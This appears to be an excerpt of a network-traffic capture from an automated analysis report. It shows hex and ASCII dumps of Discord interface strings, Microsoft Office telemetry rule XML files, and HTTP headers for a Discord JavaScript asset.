                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 68 4b 69 22 3a 22 53 65 72 76 65 72 73 22 2c 22 7a 34 56 4e 50 7a 22 3a 22 4d 69 73 73 65 64 20 63 61 6c 6c 22 2c 22 5a 63 48 48 76 72 22 3a 22 43 72 65 61 74 65 20 61 20 62 61 64 67 65 20 61 6e 64 20 74 61 67 20 66 6f 72 20 79 6f 75 72 20 47 75 69 6c 64 22 2c 22 2f 57 35 75 35 75 22 3a 5b 22 41 75 74 6f 4d 6f 64 20 71 75 61 72 61 6e 74 69 6e 65 64 20 22 2c 5b 38 2c 22 75 73 65 72 48 6f 6f 6b 22 2c 5b 5b 38 2c 22 24 62 22 2c 5b 5b 31 2c 22 75 73 65 72 22 5d 5d 5d 5d 5d 2c 22 20 66 6f 72 20 76 69 6f 6c 61 74 69 6e 67 20 63 6f 6e 74 65 6e 74 20 69 6e 20 74 68 65 69 72 20 75 73 65 72 20 70 72 6f 66 69 6c 65 22 5d 2c 22 44 30 6c 4e 42 41 22 3a 22 59 6f 75 5c 27 76 65 20 62 65 65 6e 20 73 65 6e 64 69 6e 67 20 74 6f 6f 20 6d 61 6e 79 20 47 75 69 6c 64 20 61 70
                                                                                                                                                                                                                                                                                    Data Ascii: hKi":"Servers","z4VNPz":"Missed call","ZcHHvr":"Create a badge and tag for your Guild","/W5u5u":["AutoMod quarantined ",[8,"userHook",[[8,"$b",[[1,"user"]]]]]," for violating content in their user profile"],"D0lNBA":"You\'ve been sending too many Guild ap
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 65 64 2c 20 77 69 74 68 6f 75 74 20 74 68 65 20 6e 6f 69 73 65 21 20 48 69 67 68 6c 69 67 68 74 73 20 70 72 6f 76 69 64 65 20 6f 63 63 61 73 69 6f 6e 61 6c 20 75 70 64 61 74 65 73 20 77 68 65 6e 20 79 6f 75 72 20 66 72 69 65 6e 64 73 20 61 72 65 20 63 68 61 74 74 69 6e 67 20 69 6e 20 62 75 73 79 20 73 65 72 76 65 72 73 2e 20 22 2c 5b 38 2c 22 24 6c 69 6e 6b 22 2c 5b 22 4c 65 61 72 6e 20 6d 6f 72 65 22 5d 2c 5b 5b 31 2c 22 68 65 6c 70 55 72 6c 22 5d 5d 5d 5d 2c 22 53 4e 59 6e 4c 53 22 3a 22 57 65 20 77 69 6c 6c 20 67 65 74 20 62 61 63 6b 20 74 6f 20 79 6f 75 20 6f 6e 63 65 20 77 65 20 68 61 76 65 20 6d 6f 72 65 20 75 70 64 61 74 65 73 2e 22 2c 22 54 61 68 45 2f 76 22 3a 22 73 65 6e 74 20 61 20 6d 65 73 73 61 67 65 20 79 6f 75 20 6d 69 67 68 74 20 6c 69 6b
                                                                                                                                                                                                                                                                                    Data Ascii: ed, without the noise! Highlights provide occasional updates when your friends are chatting in busy servers. ",[8,"$link",["Learn more"],[[1,"helpUrl"]]]],"SNYnLS":"We will get back to you once we have more updates.","TahE/v":"sent a message you might lik
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 45 78 70 65 72 69 6d 65 6e 74 61 6c 29 22 2c 22 47 57 71 68 62 32 22 3a 22 54 6f 70 20 43 68 61 6e 6e 65 6c 73 22 2c 22 73 41 41 70 62 32 22 3a 22 43 68 65 63 6b 20 62 61 63 6b 20 6c 61 74 65 72 20 66 6f 72 20 6d 6f 72 65 20 6e 65 77 20 63 6f 6e 74 65 6e 74 21 22 2c 22 6f 72 62 52 38 66 22 3a 5b 22 43 6f 6e 67 72 61 74 75 6c 61 74 69 6f 6e 73 2c 20 79 6f 75 5c 27 72 65 20 61 6e 20 6f 66 66 69 63 69 61 6c 20 6d 65 6d 62 65 72 20 6f 66 20 22 2c 5b 38 2c 22 24 62 22 2c 5b 5b 31 2c 22 6e 61 6d 65 22 5d 5d 5d 2c 22 21 22 5d 2c 22 46 34 74 43 43 67 22 3a 22 52 65 76 6f 6b 65 20 41 6c 6c 20 4c 69 6e 6b 73 22 2c 22 43 67 57 6d 6d 5a 22 3a 22 41 64 64 20 53 74 72 61 6e 67 65 72 20 44 61 6e 67 65 72 20 57 61 72 6e 69 6e 67 20 28 45 78 70 65 72 69 6d 65 6e 74 61 6c
                                                                                                                                                                                                                                                                                    Data Ascii: Experimental)","GWqhb2":"Top Channels","sAApb2":"Check back later for more new content!","orbR8f":["Congratulations, you\'re an official member of ",[8,"$b",[[1,"name"]]],"!"],"F4tCCg":"Revoke All Links","CgWmmZ":"Add Stranger Danger Warning (Experimental
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 22 5d 2c 22 71 50 55 50 69 6f 22 3a 22 41 6c 6c 6f 77 73 20 6d 65 6d 62 65 72 73 20 74 6f 20 75 73 65 20 45 78 74 65 72 6e 61 6c 20 41 70 70 73 20 69 6e 20 74 68 69 73 20 63 68 61 6e 6e 65 6c 5c 27 73 20 74 68 72 65 61 64 73 2e 22 2c 22 30 77 45 51 51 30 22 3a 22 47 61 6d 65 73 20 59 6f 75 72 20 4d 65 6d 62 65 72 73 20 41 72 65 20 50 6c 61 79 69 6e 67 22 2c 22 52 4e 78 73 72 36 22 3a 5b 22 59 6f 75 72 20 73 65 72 76 65 72 20 69 73 20 22 2c 5b 38 2c 22 72 61 74 69 6e 67 48 6f 6f 6b 22 2c 5b 22 76 65 72 79 20 68 61 72 64 20 74 6f 20 6a 6f 69 6e 22 5d 5d 5d 2c 22 46 6b 77 44 33 4e 22 3a 22 53 63 61 6e 20 74 68 69 73 20 51 52 20 63 6f 64 65 20 66 6f 72 20 61 6e 20 65 61 73 79 20 64 6f 77 6e 6c 6f 61 64 20 6c 69 6e 6b 20 66 6f 72 20 6f 75 72 20 69 4f 53 20 6f
                                                                                                                                                                                                                                                                                    Data Ascii: "],"qPUPio":"Allows members to use External Apps in this channel\'s threads.","0wEQQ0":"Games Your Members Are Playing","RNxsr6":["Your server is ",[8,"ratingHook",["very hard to join"]]],"FkwD3N":"Scan this QR code for an easy download link for our iOS o
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 68 69 6d 73 69 63 61 6c 2d 77 69 7a 61 72 64 22 2c 22 45 30 4d 67 48 68 22 3a 22 47 6f 74 20 69 74 22 2c 22 31 50 76 72 2f 76 22 3a 22 42 61 64 67 65 22 2c 22 37 6c 33 45 79 4d 22 3a 5b 5b 38 2c 22 24 6c 69 6e 6b 22 2c 5b 5b 31 2c 22 75 73 65 72 6e 61 6d 65 22 5d 5d 2c 5b 5b 31 2c 22 75 73 65 72 6e 61 6d 65 4f 6e 43 6c 69 63 6b 22 5d 5d 5d 2c 22 20 6a 75 73 74 20 6a 6f 69 6e 65 64 20 74 68 65 20 47 75 69 6c 64 2e 20 57 65 20 68 6f 70 65 20 79 6f 75 20 62 72 6f 75 67 68 74 20 70 69 7a 7a 61 2e 22 5d 2c 22 4a 45 57 6b 4e 7a 22 3a 22 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 59 6f 75 20 6d 61 79 20 6e 6f 74 20 62 65 20 65 6c 69 67 69 62 6c 65 20 74 6f 20 65 6e 72 6f 6c 6c 20 69 6e 20 74 68 69 73 20 51 75 65 73 74 2e 22 2c 22 6a 59 65
                                                                                                                                                                                                                                                                                    Data Ascii: himsical-wizard","E0MgHh":"Got it","1Pvr/v":"Badge","7l3EyM":[[8,"$link",[[1,"username"]],[[1,"usernameOnClick"]]]," just joined the Guild. We hope you brought pizza."],"JEWkNz":"Something went wrong. You may not be eligible to enroll in this Quest.","jYe
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 22 36 6b 70 39 48 78 22 3a 22 5b 61 74 74 61 63 68 6d 65 6e 74 5d 22 2c 22 65 41 31 79 6d 70 22 3a 22 41 6e 20 75 70 64 61 74 65 20 74 6f 20 79 6f 75 72 20 74 61 67 20 69 73 20 61 76 61 69 6c 61 62 6c 65 22 2c 22 31 50 37 70 76 62 22 3a 5b 22 46 72 6f 6d 20 22 2c 5b 31 2c 22 67 75 69 6c 64 4e 61 6d 65 31 22 5d 2c 22 2c 20 22 2c 5b 31 2c 22 67 75 69 6c 64 4e 61 6d 65 32 22 5d 2c 22 2c 20 22 2c 22 26 20 22 2c 5b 31 2c 22 6e 75 6d 47 75 69 6c 64 73 52 65 6d 61 69 6e 69 6e 67 22 5d 2c 22 20 6d 6f 72 65 2e 22 5d 2c 22 54 5a 66 74 50 44 22 3a 22 53 61 76 65 20 26 20 45 78 69 74 22 2c 22 6c 66 59 57 57 31 22 3a 22 43 75 73 74 6f 6d 20 43 6f 6c 6f 72 73 22 2c 22 58 59 4c 4f 79 4d 22 3a 22 45 6d 6f 6a 69 20 48 6f 73 65 22 2c 22 78 46 65 6f 71 36 22 3a 5b 22 54 68
                                                                                                                                                                                                                                                                                    Data Ascii: "6kp9Hx":"[attachment]","eA1ymp":"An update to your tag is available","1P7pvb":["From ",[1,"guildName1"],", ",[1,"guildName2"],", ","& ",[1,"numGuildsRemaining"]," more."],"TZftPD":"Save & Exit","lfYWW1":"Custom Colors","XYLOyM":"Emoji Hose","xFeoq6":["Th
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 64 6f 6e 5c 27 74 20 6b 6e 6f 77 20 77 68 61 74 20 74 6f 20 64 6f 20 68 65 72 65 22 2c 22 70 47 2f 66 39 50 22 3a 22 4d 61 78 6d 69 6d 75 6d 20 34 20 63 68 61 72 61 63 74 65 72 73 2c 20 61 6c 70 68 61 62 65 74 20 28 41 2d 5a 29 20 61 6e 64 20 6e 75 6d 62 65 72 73 20 6f 6e 6c 79 22 2c 22 57 71 45 48 35 4f 22 3a 22 53 65 6c 65 63 74 20 54 6f 70 69 63 73 22 2c 22 45 35 5a 6a 31 64 22 3a 5b 22 4e 65 77 20 72 65 63 72 75 69 74 21 20 22 2c 5b 38 2c 22 75 73 65 72 6e 61 6d 65 48 6f 6f 6b 22 2c 5b 5b 31 2c 22 75 73 65 72 6e 61 6d 65 22 5d 5d 5d 2c 22 20 6a 6f 69 6e 65 64 20 74 68 65 20 47 75 69 6c 64 2e 22 5d 2c 22 4e 55 4d 41 73 4c 22 3a 22 43 6f 6e 74 61 63 74 20 43 72 69 73 69 73 20 54 65 78 74 20 4c 69 6e 65 22 2c 22 6f 61 38 2b 6b 70 22 3a 5b 22 41 20 6e 65
                                                                                                                                                                                                                                                                                    Data Ascii: don\'t know what to do here","pG/f9P":"Maxmimum 4 characters, alphabet (A-Z) and numbers only","WqEH5O":"Select Topics","E5Zj1d":["New recruit! ",[8,"usernameHook",[[1,"username"]]]," joined the Guild."],"NUMAsL":"Contact Crisis Text Line","oa8+kp":["A ne
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 53 74 61 74 75 73 22 2c 22 78 34 4d 66 46 78 22 3a 5b 5b 38 2c 22 75 73 65 72 48 6f 6f 6b 22 2c 5b 5b 38 2c 22 24 62 22 2c 5b 5b 31 2c 22 75 73 65 72 22 5d 5d 5d 5d 5d 2c 22 20 75 70 64 61 74 65 64 20 74 68 65 20 73 63 68 65 64 75 6c 65 64 20 65 76 65 6e 74 20 22 2c 5b 38 2c 22 74 61 72 67 65 74 48 6f 6f 6b 22 2c 5b 22 5c 5c 22 22 2c 5b 31 2c 22 74 61 72 67 65 74 22 5d 2c 22 5c 5c 22 22 5d 5d 5d 2c 22 6f 57 30 65 55 56 22 3a 22 42 65 74 61 22 2c 22 4d 56 69 37 4c 53 22 3a 22 53 75 70 70 72 65 73 73 20 48 69 67 68 6c 69 67 68 74 73 20 69 6e 20 74 68 69 73 20 73 65 72 76 65 72 22 2c 22 30 71 56 56 75 37 22 3a 22 57 65 20 61 6c 77 61 79 73 20 68 61 76 65 20 61 20 67 6f 6f 64 20 74 69 6d 65 20 2d 20 77 69 6e 20 6f 72 20 6c 6f 73 65 21 22 2c 22 50 53 68 4e 56
                                                                                                                                                                                                                                                                                    Data Ascii: Status","x4MfFx":[[8,"userHook",[[8,"$b",[[1,"user"]]]]]," updated the scheduled event ",[8,"targetHook",["\\"",[1,"target"],"\\""]]],"oW0eUV":"Beta","MVi7LS":"Suppress Highlights in this server","0qVVu7":"We always have a good time - win or lose!","PShNV
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 22 74 6e 7a 35 2f 2f 22 3a 22 41 73 6b 20 71 75 65 73 74 69 6f 6e 73 20 74 6f 20 67 65 74 20 74 6f 20 6b 6e 6f 77 20 70 6f 74 65 6e 74 69 61 6c 20 6d 65 6d 62 65 72 73 20 62 65 74 74 65 72 2e 20 59 6f 75 5c 27 6c 6c 20 72 65 76 69 65 77 20 74 68 65 69 72 20 61 6e 73 77 65 72 73 20 61 6e 64 20 64 65 63 69 64 65 20 69 66 20 74 68 65 79 20 61 72 65 20 61 70 70 72 6f 76 65 64 20 74 6f 20 6a 6f 69 6e 2e 20 59 6f 75 5c 27 6c 6c 20 61 6c 73 6f 20 62 65 20 61 62 6c 65 20 74 6f 20 69 6e 74 65 72 76 69 65 77 20 61 70 70 6c 69 63 61 6e 74 73 20 74 6f 20 67 65 74 20 74 6f 20 6b 6e 6f 77 20 74 68 65 6d 20 62 65 74 74 65 72 2e 22 2c 22 67 46 4d 4d 4f 44 22 3a 22 43 68 6f 6f 73 65 20 79 6f 75 72 20 6d 61 69 6e 20 69 73 73 75 65 22 2c 22 4f 32 50 44 4a 43 22 3a 22 45 78
                                                                                                                                                                                                                                                                                    Data Ascii: "tnz5//":"Ask questions to get to know potential members better. You\'ll review their answers and decide if they are approved to join. You\'ll also be able to interview applicants to get to know them better.","gFMMOD":"Choose your main issue","O2PDJC":"Ex


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    54192.168.2.54977213.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 95b9e869-801e-008c-3081-3b7130000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201240Z-174c587ffdfgcs66hC1TEB69cs00000003ag000000005c1h
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    55192.168.2.54977313.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 423
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                                                    x-ms-request-id: d83ea369-501e-000a-040c-3d0180000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201240Z-178bfbc474b9fdhphC1NYCac0n00000004wg0000000086yg
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    56192.168.2.54977113.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 74046e45-401e-000a-0635-3c4a7b000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201240Z-178bfbc474b9xljthC1NYCtw9400000004z000000000019f
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    57192.168.2.549778162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC745OUTGET /assets/5067a2ec1b24a6de868c.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/assets/ac625b77a0bab0ee72df.js
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC967INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 13374
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0c2ff1b41a9-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "d0c788b157ff96a2dd902c97bfc889f6"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 28 Jun 2024 00:43:12 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sLJaXKHfCQ1qSKDAmdf06VBD2cU2tEyCFKG0bNF6BFCexUDvFO6bD0f4q6jyik1yAeoEMJi6o9MMNpFMSuh1FuKBzjR5BpTkNMPBug4DsxP%2BpgmoR%2FxZ54cii1X1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC402INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 38 31 38 37 22 5d 2c 7b 35 32 36 39 38 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 65 3d 72 28 33 35 34 38 34 38 29 2c 6f 3d 72 28 39 33 38 35 30 37 29 2c 69 3d 54 79 70 65 45 72 72 6f 72 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 65 28 74 29 29 72 65 74 75 72 6e 20 74 3b 74 68 72 6f 77 20 69 28 6f 28 74 29 2b 22 20 69 73 20 6e 6f 74 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 7d 2c 32 34 30 33 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["78187"],{526988:function(t,n,r){var e=r(354848),o=r(938507),i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not a function")}},24033:function(t,n,r){
